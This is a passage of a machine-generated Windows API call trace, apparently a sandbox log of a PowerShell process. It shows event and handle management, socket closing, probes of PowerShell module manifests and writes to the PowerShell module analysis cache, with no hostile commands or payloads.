(lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7a0 [0167.756] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7a4 [0167.757] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7a8 [0167.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7ac [0167.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7b0 [0167.757] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7b4 [0167.758] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7b8 [0167.758] SetEvent (hEvent=0x79c) returned 1 [0167.758] SetEvent (hEvent=0x54c) returned 1 [0167.758] SetEvent (hEvent=0x6ec) returned 1 [0167.758] SetEvent (hEvent=0x790) returned 1 [0167.758] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7bc [0167.758] SetEvent (hEvent=0x370) returned 1 [0167.768] SetEvent (hEvent=0x798) returned 1 [0167.768] SetEvent (hEvent=0x7a0) returned 1 [0167.768] SetEvent (hEvent=0x7a4) returned 1 [0167.809] CoCreateGuid (in: pguid=0xede48 | out: pguid=0xede48*(Data1=0x4a2f00ac, Data2=0x1a69, Data3=0x4af5, Data4=([0]=0x80, [1]=0x5e, [2]=0xfd, [3]=0x78, [4]=0x16, [5]=0xfb, [6]=0x17, [7]=0xad))) returned 0x0 [0167.813] ReportEventW (hEventLog=0x4cc0004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2709bfc*="Stopped", lpRawData=0x2709b24) returned 1 [0167.827] SetEvent (hEvent=0x370) returned 1 [0167.895] CloseHandle (hObject=0x370) returned 1 [0168.007] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0168.011] CoGetContextToken (in: pToken=0xef514 | out: pToken=0xef514) returned 0x0 [0168.011] IUnknown:QueryInterface (in: This=0x623860, riid=0x71d3b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xef538 | out: ppvObject=0xef538*=0x62386c) returned 0x0 [0168.012] IComThreadingInfo:GetCurrentThreadType (in: This=0x62386c, pThreadType=0xef598 | out: pThreadType=0xef598*=0) returned 0x0 [0168.012] IUnknown:Release (This=0x62386c) returned 0x0 [0168.014] CoGetContextToken (in: pToken=0xef224 | out: pToken=0xef224) returned 0x0 [0168.014] IUnknown:QueryInterface (in: This=0x623860, riid=0x71d3b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xef248 | out: ppvObject=0xef248*=0x62386c) returned 0x0 [0168.014] IComThreadingInfo:GetCurrentThreadType (in: This=0x62386c, pThreadType=0xef274 | out: pThreadType=0xef274*=0) returned 0x0 [0168.014] IUnknown:Release (This=0x62386c) returned 0x0 [0168.016] CoGetContextToken (in: pToken=0xef224 | out: pToken=0xef224) returned 0x0 [0168.016] IUnknown:QueryInterface (in: This=0x623860, riid=0x71d3b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xef248 | out: ppvObject=0xef248*=0x62386c) returned 0x0 [0168.016] IComThreadingInfo:GetCurrentThreadType (in: This=0x62386c, pThreadType=0xef274 | out: pThreadType=0xef274*=0) returned 0x0 [0168.017] IUnknown:Release (This=0x62386c) returned 0x0 [0168.115] CoGetContextToken (in: pToken=0xef224 | out: pToken=0xef224) returned 0x0 [0168.115] IUnknown:QueryInterface (in: This=0x623860, riid=0x71d3b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xef248 | out: ppvObject=0xef248*=0x62386c) returned 0x0 [0168.115] IComThreadingInfo:GetCurrentThreadType (in: This=0x62386c, pThreadType=0xef274 | out: pThreadType=0xef274*=0) returned 0x0 [0168.115] IUnknown:Release (This=0x62386c) returned 0x0 [0168.138] CoGetContextToken (in: pToken=0xef244 | out: pToken=0xef244) returned 0x0 [0168.138] IUnknown:QueryInterface (in: This=0x623860, riid=0x71d3b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xef268 | out: ppvObject=0xef268*=0x62386c) returned 0x0 [0168.138] IComThreadingInfo:GetCurrentThreadType (in: This=0x62386c, pThreadType=0xef294 | out: pThreadType=0xef294*=0) returned 0x0 [0168.138] IUnknown:Release (This=0x62386c) returned 0x0 [0168.139] CoUninitialize () Thread: id = 68 os_tid = 0xfa4 Thread: id = 69 os_tid = 0xfa8 [0113.355] RegCloseKey (hKey=0x36c) returned 0x0 [0118.755] CloseHandle (hObject=0x3fc) returned 1 [0118.756] CloseHandle (hObject=0x410) returned 1 [0118.762] CloseHandle (hObject=0x3f0) returned 1 [0118.762] CloseHandle (hObject=0x3f8) returned 1 [0118.763] CloseHandle (hObject=0x3f4) returned 1 [0118.764] CloseHandle (hObject=0x418) returned 1 [0118.765] CloseHandle (hObject=0x404) returned 1 [0118.770] CloseHandle (hObject=0x40c) returned 1 [0118.771] CloseHandle (hObject=0x3d0) returned 1 [0118.771] CloseHandle (hObject=0x36c) returned 1 [0118.772] CloseHandle (hObject=0x408) returned 1 [0150.893] CloseHandle (hObject=0x40c) returned 1 [0150.893] CloseHandle (hObject=0x3d0) returned 1 [0150.894] CloseHandle (hObject=0x3f0) returned 1 [0150.894] CloseHandle (hObject=0x3f8) returned 1 [0150.894] CloseHandle (hObject=0x3f4) returned 1 [0154.303] CoGetContextToken (in: pToken=0x21ff844 | out: pToken=0x21ff844) returned 0x0 [0154.303] IUnknown:QueryInterface (in: This=0x6239d0, riid=0x71e58ae0*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x21ff7e4 | out: ppvObject=0x21ff7e4*=0x6239e0) returned 0x0 [0154.304] CObjectContext::ContextCallback () returned 0x0 [0155.995] IUnknown:Release (This=0x6239e0) returned 0x1 [0155.995] CloseHandle (hObject=0x28c) returned 1 [0155.996] CloseHandle (hObject=0x320) returned 1 [0155.996] CloseHandle (hObject=0x53c) returned 1 [0155.996] CloseHandle (hObject=0x520) returned 1 [0155.996] CloseHandle (hObject=0x36c) returned 1 [0155.997] CloseHandle (hObject=0x544) returned 1 [0155.997] CloseHandle (hObject=0x52c) returned 1 [0155.997] CloseHandle (hObject=0x408) returned 1 [0155.997] CertFreeCRLContext (pCrlContext=0x5bf7d50) returned 1 [0155.999] CloseHandle (hObject=0x19c) returned 1 [0155.999] CertFreeCRLContext (pCrlContext=0x5bf7d00) returned 1 [0155.999] CloseHandle (hObject=0x290) returned 1 [0157.238] EtwEventUnregister () returned 0x0 [0157.458] RegCloseKey (hKey=0x80000004) returned 0x0 [0157.460] CoGetContextToken (in: pToken=0x21ff804 | out: pToken=0x21ff804) returned 0x0 [0157.460] IUnknown:QueryInterface (in: This=0x6239d0, riid=0x71e58ae0*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x21ff7a4 | out: ppvObject=0x21ff7a4*=0x6239e0) returned 0x0 [0157.460] CObjectContext::ContextCallback () returned 0x0 [0157.461] IUnknown:Release (This=0x6239e0) returned 0x1 [0157.461] IUnknown:Release (This=0x6239d0) returned 0x0 [0163.771] CloseHandle (hObject=0x54c) returned 1 [0167.036] CoGetContextToken (in: pToken=0x21ff844 | out: pToken=0x21ff844) returned 0x0 [0167.036] IUnknown:QueryInterface (in: This=0x6239d0, riid=0x71e58ae0*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x21ff7e4 | out: ppvObject=0x21ff7e4*=0x6239e0) returned 0x0 [0167.037] CObjectContext::ContextCallback () returned 0x0 [0167.039] IUnknown:Release (This=0x6239e0) returned 0x1 [0167.039] CloseHandle (hObject=0x56c) returned 1 [0167.039] CloseHandle (hObject=0x55c) returned 1 [0167.039] CloseHandle (hObject=0x568) returned 1 [0167.040] CloseHandle (hObject=0x564) returned 1 [0167.040] CloseHandle (hObject=0x560) returned 1 [0168.015] EtwEventUnregister () returned 0x0 [0168.015] EtwEventUnregister () returned 0x0 [0168.015] EtwEventUnregister () returned 0x0 [0168.015] EtwEventUnregister () returned 0x0 [0168.015] EtwEventUnregister () returned 0x0 [0168.015] EtwEventUnregister () returned 0x0 [0168.015] EtwEventUnregister () returned 0x0 [0168.015] EtwEventUnregister () returned 0x0 [0168.015] EtwEventUnregister () returned 0x0 [0168.025] LocalFree (hMem=0x63deb8) returned 0x0 [0168.027] LocalFree (hMem=0x63e050) returned 0x0 [0168.055] EtwEventUnregister () returned 0x0 [0168.059] CloseHandle (hObject=0x2bc) returned 1 [0168.098] CloseHandle (hObject=0x364) returned 1 [0168.099] CloseHandle (hObject=0x360) returned 1 [0168.099] CloseHandle (hObject=0x35c) returned 1 [0168.099] CloseHandle (hObject=0x358) returned 1 [0168.100] CloseHandle (hObject=0x354) returned 1 [0168.100] CloseHandle (hObject=0x350) returned 1 [0168.100] CloseHandle (hObject=0x34c) returned 1 [0168.101] CloseHandle (hObject=0x348) returned 1 [0168.101] CloseHandle (hObject=0x344) returned 1 [0168.101] CloseHandle (hObject=0x340) returned 1 [0168.102] CloseHandle (hObject=0x33c) returned 1 [0168.102] CloseHandle (hObject=0x334) returned 1 [0168.103] setsockopt (s=0x480, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0168.103] closesocket (s=0x480) returned 0 [0168.104] CloseHandle (hObject=0x484) returned 1 [0168.104] CloseHandle (hObject=0x6ec) returned 1 [0168.104] CloseHandle (hObject=0x55c) returned 1 [0168.105] RegCloseKey (hKey=0x4b4) returned 0x0 [0168.105] setsockopt (s=0x478, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0168.106] closesocket (s=0x478) returned 0 [0168.106] CloseHandle (hObject=0x47c) returned 1 [0168.106] CloseHandle (hObject=0x3d4) returned 1 [0168.107] UnmapViewOfFile (lpBaseAddress=0x42a0000) returned 1 [0168.108] LocalFree (hMem=0x6bc9a8) returned 0x0 [0168.109] CloseHandle (hObject=0x54c) returned 1 [0168.109] CloseHandle (hObject=0x4b0) returned 1 [0168.109] CloseHandle (hObject=0x7bc) returned 1 [0168.110] RegCloseKey (hKey=0x4a4) returned 0x0 [0168.110] RegCloseKey (hKey=0x4a0) returned 0x0 [0168.111] CloseHandle (hObject=0x488) returned 1 [0168.112] CloseHandle (hObject=0x7b8) returned 1 [0168.112] CloseHandle (hObject=0x7b4) returned 1 [0168.112] CloseHandle (hObject=0x7b0) returned 1 [0168.113] CloseHandle (hObject=0x7ac) returned 1 [0168.113] CloseHandle (hObject=0x7a8) returned 1 [0168.113] CloseHandle (hObject=0xf) returned 1 [0168.127] DeregisterEventSource (hEventLog=0x4cc0004) returned 1 [0168.128] setsockopt (s=0x534, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0168.128] closesocket (s=0x534) returned 0 [0168.129] CloseHandle (hObject=0x538) returned 1 [0168.129] RegCloseKey (hKey=0x4ac) returned 0x0 [0168.129] CloseHandle (hObject=0x4a8) returned 1 [0168.130] setsockopt (s=0x528, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0168.130] closesocket (s=0x528) returned 0 [0168.130] CloseHandle (hObject=0x530) returned 1 [0168.131] WinHttpCloseHandle (hInternet=0x66c9d0) returned 1 [0168.131] CloseHandle (hObject=0x22c) returned 1 [0168.131] CloseHandle (hObject=0x7a4) returned 1 [0168.132] CloseHandle (hObject=0x4bc) returned 1 [0168.132] CloseHandle (hObject=0x4b8) returned 1 [0168.133] LocalFree (hMem=0x5bc3b18) returned 0x0 [0168.133] CloseHandle (hObject=0x568) returned 1 [0168.134] CloseHandle (hObject=0x7a0) returned 1 [0168.134] CloseHandle (hObject=0x798) returned 1 [0168.134] RegCloseKey (hKey=0x80000004) returned 0x0 [0168.135] CloseHandle (hObject=0x79c) returned 1 [0168.136] CloseHandle (hObject=0x790) returned 1 [0168.136] CloseHandle (hObject=0x368) returned 1 Thread: id = 70 os_tid = 0xfac Thread: id = 71 os_tid = 0xfb4 [0122.295] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1")) returned 0x20 [0122.297] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1")) returned 0x20 [0122.298] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1")) returned 0x20 [0122.299] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1")) returned 0x20 [0122.299] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1")) returned 0x20 [0122.449] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psworkflow\\psworkflow.psd1")) returned 0xffffffff [0122.449] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1")) returned 0x20 [0122.515] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psworkflowutility\\psworkflowutility.psd1")) returned 0xffffffff [0122.515] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1")) returned 0x20 [0122.518] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\networkswitchmanager\\networkswitchmanager.psd1")) returned 0xffffffff [0122.518] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\psdesiredstateconfiguration.psd1")) returned 0x20 [0122.595] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1")) returned 0x20 [0122.596] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1")) returned 0x20 [0122.597] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0xffffffff [0122.597] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1")) returned 0x20 [0122.598] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1")) returned 0x20 [0122.598] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0122.599] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1")) returned 0x20 [0122.600] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1")) returned 0x20 [0122.600] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts\\1.0.0.0\\Microsoft.PowerShell.LocalAccounts.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.localaccounts\\1.0.0.0\\microsoft.powershell.localaccounts.psd1")) returned 0xffffffff [0122.600] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0122.601] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1")) returned 0x20 [0122.601] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0122.601] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1")) returned 0x20 [0122.641] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0122.641] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1")) returned 0x20 [0129.119] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0x2020 [0129.120] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0129.120] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x51 [0129.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x435f260) returned 1 [0129.121] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), fInfoLevelId=0x0, lpFileInformation=0x25b8140 | out: lpFileInformation=0x25b8140*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa18da600, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0xa18da600, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xa1900760, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x3511)) returned 1 [0129.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x435f25c) returned 1 [0129.122] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0129.122] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x51 [0129.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x435f44c) returned 1 [0129.122] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0129.125] GetFileType (hFile=0x36c) returned 0x1 [0129.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x435f448) returned 1 [0129.125] GetFileType (hFile=0x36c) returned 0x1 [0129.614] WriteFile (in: hFile=0x36c, lpBuffer=0x24fd858*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x435f4d0, lpOverlapped=0x0 | out: lpBuffer=0x24fd858*, lpNumberOfBytesWritten=0x435f4d0*=0x1000, lpOverlapped=0x0) returned 1 [0129.616] WriteFile (in: hFile=0x36c, lpBuffer=0x24fd858*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x435f4d0, lpOverlapped=0x0 | out: lpBuffer=0x24fd858*, lpNumberOfBytesWritten=0x435f4d0*=0x1000, lpOverlapped=0x0) returned 1 [0129.617] WriteFile (in: hFile=0x36c, lpBuffer=0x24fd858*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x435f4d0, lpOverlapped=0x0 | out: lpBuffer=0x24fd858*, lpNumberOfBytesWritten=0x435f4d0*=0x1000, lpOverlapped=0x0) returned 1 [0129.617] WriteFile (in: hFile=0x36c, lpBuffer=0x24fd858*, nNumberOfBytesToWrite=0x606, lpNumberOfBytesWritten=0x435f4bc, lpOverlapped=0x0 | out: lpBuffer=0x24fd858*, lpNumberOfBytesWritten=0x435f4bc*=0x606, lpOverlapped=0x0) returned 1 [0129.617] CloseHandle (hObject=0x36c) returned 1 [0129.620] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0129.620] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x51 [0129.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x435f260) returned 1 [0129.620] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), fInfoLevelId=0x0, lpFileInformation=0x25ff4ec | out: lpFileInformation=0x25ff4ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa18da600, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0xa18da600, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x6fe6aea0, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x3606)) returned 1 [0129.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x435f25c) returned 1 Thread: id = 72 os_tid = 0xfb8 Thread: id = 73 os_tid = 0xfbc Thread: id = 74 os_tid = 0xfc0 Thread: id = 75 os_tid = 0xfc4 [0149.140] CoUninitialize () Thread: id = 76 os_tid = 0xfcc [0168.116] CoGetContextToken (in: pToken=0x4cbf394 | out: pToken=0x4cbf394) returned 0x0 [0168.116] IUnknown:QueryInterface (in: This=0x623860, riid=0x71d3b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4cbf3b8 | out: ppvObject=0x4cbf3b8*=0x62386c) returned 0x0 [0168.116] IComThreadingInfo:GetCurrentThreadType (in: This=0x62386c, pThreadType=0x4cbf3e4 | out: pThreadType=0x4cbf3e4*=0) returned 0x0 [0168.116] IUnknown:Release (This=0x62386c) returned 0x0 Thread: id = 77 os_tid = 0xfd0 Thread: id = 80 os_tid = 0xfe0 Thread: id = 81 os_tid = 0xfe4 [0109.462] CoCreateGuid (in: pguid=0x4e5eda0 | out: pguid=0x4e5eda0*(Data1=0x2e756240, Data2=0x5c67, Data3=0x433d, Data4=([0]=0xaf, [1]=0x63, [2]=0x62, [3]=0x22, [4]=0xb0, [5]=0xd0, [6]=0x4d, [7]=0xd3))) returned 0x0 [0164.227] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0x2020 [0164.229] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x104, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x51 [0164.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4e5f0a0) returned 1 [0164.229] GetFileAttributesExW (in: 